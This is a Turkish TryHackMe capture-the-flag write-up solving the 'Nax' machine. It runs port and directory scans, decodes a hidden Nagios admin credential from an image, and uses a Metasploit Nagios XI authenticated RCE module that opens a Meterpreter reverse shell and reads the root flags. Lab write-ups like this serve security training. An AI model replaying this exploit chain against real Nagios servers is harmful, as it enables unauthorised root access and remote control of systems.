Table of Contents
Merhabalar, bu yazımda sizlere TryHackMe platformunda bulunan “Nax” isimli makinenin çözümü anlatacağım. Keyifli Okumalar…
Çözüm
1 — Nmap aracını kullanarak makine üzerindeki açık portlar ve servisler hakkında detaylı bilgi ediniyorum.
[root:/home/alper/Desktop/TRYHACKME]# nmap -sS -sV 10.10.242.15
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-10 10:43 +03
Nmap scan report for 10.10.242.15
Host is up (0.079s latency).
Not shown: 995 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
Service Info: Host: ubuntu.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel2 — Sayfa kaynağını incelediğimde bazı sayılar görüyorum. Bunların bazı harflerin ASCII karşılığı olduğunu düşünüyorum ve çevirdiğim zaman “/PI3T.PNg” kelimesine ulaşıyorum.
47, 80, 73, 51, 84, 46, 80, 78, 103
/, P, I, 3, T, ., P, N, g
[root:/home/alper/Desktop/TRYHACKME]# wget http://10.10.242.15/PI3T.PNg
--2023-06-10 10:47:37-- http://10.10.242.15/PI3T.PNg
Connecting to 10.10.242.15:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 982359 (959K) [image/png]
Saving to: ‘PI3T.PNg’
PI3T.PNg 100%[=========================================================================================================================================>] 959.33K 2.30MB/s in 0.4s
2023-06-10 10:47:38 (2.30 MB/s) - ‘PI3T.PNg’ saved [982359/982359]3 — İndirdiğim dosyayı GIMP aracı ile açıp “ppm” uzantılı olarak kaydediyorum. Daha sonra NPIET aracı ile ppm dosyasını çözüyorum. Buradan “nagiosadmin” ve parola bilgisi elde ediyorum.
[root:.../alper/Downloads/npiet-1.3f]# ./npiet /home/alper/Desktop/TRYHACKME/PI3T.ppm
nagiosadmin%*CENSORED*4 — Dizin taraması başlatıyorum.
[root:/home/alper/Desktop/TRYHACKME]# gobuster dir -u http://10.10.242.15/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.242.15/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/06/10 10:56:45 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 277]
/.hta (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/cgi-bin/ (Status: 403) [Size: 277]
/index.html (Status: 200) [Size: 1332]
/index.php (Status: 200) [Size: 2968]
/javascript (Status: 301) [Size: 317] [--> http://10.10.242.15/javascript/]
/nagios (Status: 401) [Size: 459]
/server-status (Status: 403) [Size: 277]5 — “/nagios” dizinine gidip giriş yapıyorum. Sürümün 4.4.2 olduğunu görüyorum. Nagios, CVE raporlarını araştırdığımda “Nagios XI before 5.6.6 allows remote command execution as root” açıklamasıyla CVE-2019–15949 ID li CVE raporunu görüyorum.
6 — “Metasploit-framework” içerisindeki nagios modüllerini inceliyorum.
msf6 > search nagios
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/misc/nagios_nrpe_arguments 2013-02-21 excellent Yes Nagios Remote Plugin Executor Arbitrary Command Execution
1 exploit/linux/http/nagios_xi_snmptrap_authenticated_rce 2020-10-20 excellent Yes Nagios XI 5.5.0-5.7.3 - Snmptrap Authenticated Remote Code Exection
2 exploit/linux/http/nagios_xi_configwizards_authenticated_rce 2021-02-13 excellent Yes Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection
3 exploit/linux/http/nagios_xi_mibs_authenticated_rce 2020-10-20 excellent Yes Nagios XI 5.6.0-5.7.3 - Mibs.php Authenticated Remote Code Exection
4 exploit/linux/http/nagios_xi_autodiscovery_webshell 2021-07-15 excellent Yes Nagios XI Autodiscovery Webshell Upload
5 exploit/linux/http/nagios_xi_chained_rce 2016-03-06 excellent Yes Nagios XI Chained Remote Code Execution
6 exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo 2018-04-17 manual Yes Nagios XI Chained Remote Code Execution
7 post/linux/gather/enum_nagios_xi 2018-04-17 normal No Nagios XI Enumeration
8 exploit/linux/http/nagios_xi_magpie_debug 2018-11-14 excellent Yes Nagios XI Magpie_debug.php Root Remote Code Execution
9 exploit/unix/webapp/nagios_graph_explorer 2012-11-30 excellent Yes Nagios XI Network Monitor Graph Explorer Component Command Injection
10 exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce 2019-07-29 excellent Yes Nagios XI Prior to 5.6.6 getprofile.sh Authenticated Remote Command Execution
11 exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce 2020-12-19 excellent Yes Nagios XI Prior to 5.8.0 - Plugins Filename Authenticated Remote Code Exection
12 auxiliary/scanner/http/nagios_xi_scanner normal No Nagios XI Scanner
13 exploit/unix/webapp/nagios3_history_cgi 2012-12-09 great Yes Nagios3 history.cgi Host Command Execution
14 exploit/unix/webapp/nagios3_statuswml_ping 2009-06-22 excellent No Nagios3 statuswml.cgi Ping Command Execution7 — Raporun açıklamasından yola çıkarak “exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce” modülünü kullanıyorum.
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set LHOST 10.8.94.51
LHOST => 10.8.94.51
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set RHOSTS 10.10.242.15
RHOSTS => 10.10.242.15
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set PASSWORD *CENSORED*
PASSWORD => *CENSORED*
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > run
[*] Started reverse TCP handler on 10.8.94.51:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI.
[*] Target is Nagios XI with version 5.5.6.
[+] The target appears to be vulnerable.
[*] Uploading malicious 'check_ping' plugin...
[*] Command Stager progress - 100.00% done (897/897 bytes)
[+] Successfully uploaded plugin.
[*] Executing plugin...
[*] Waiting up to 300 seconds for the plugin to request the final payload...
[*] Sending stage (3045348 bytes) to 10.10.242.15
[*] Meterpreter session 1 opened (10.8.94.51:4444 -> 10.10.242.15:37986) at 2023-06-10 11:05:28 +0300
[*] Deleting malicious 'check_ping' plugin...
[+] Plugin deleted.
meterpreter >8 — Root kullanıcısı ile 2 bayrağı da elde ediyorum.
meterpreter > shell
Process 10231 created.
Channel 1 created.
whoami
root
SHELL=/bin/bash script -q /dev/null
root@ubuntu:/usr/local/nagiosxi/html/includes/components/profile# cd /home
cd /home
root@ubuntu:/home# ls
ls
galand
root@ubuntu:/home# cd galand
cd galand
root@ubuntu:/home/galand# ls
ls
nagiosxi user.txt
root@ubuntu:/home/galand# cat user.txt
cat user.txt
*CENSORED*
root@ubuntu:/home/galand# cat /root/root.txt
cat /root/root.txt
*CENSORED*
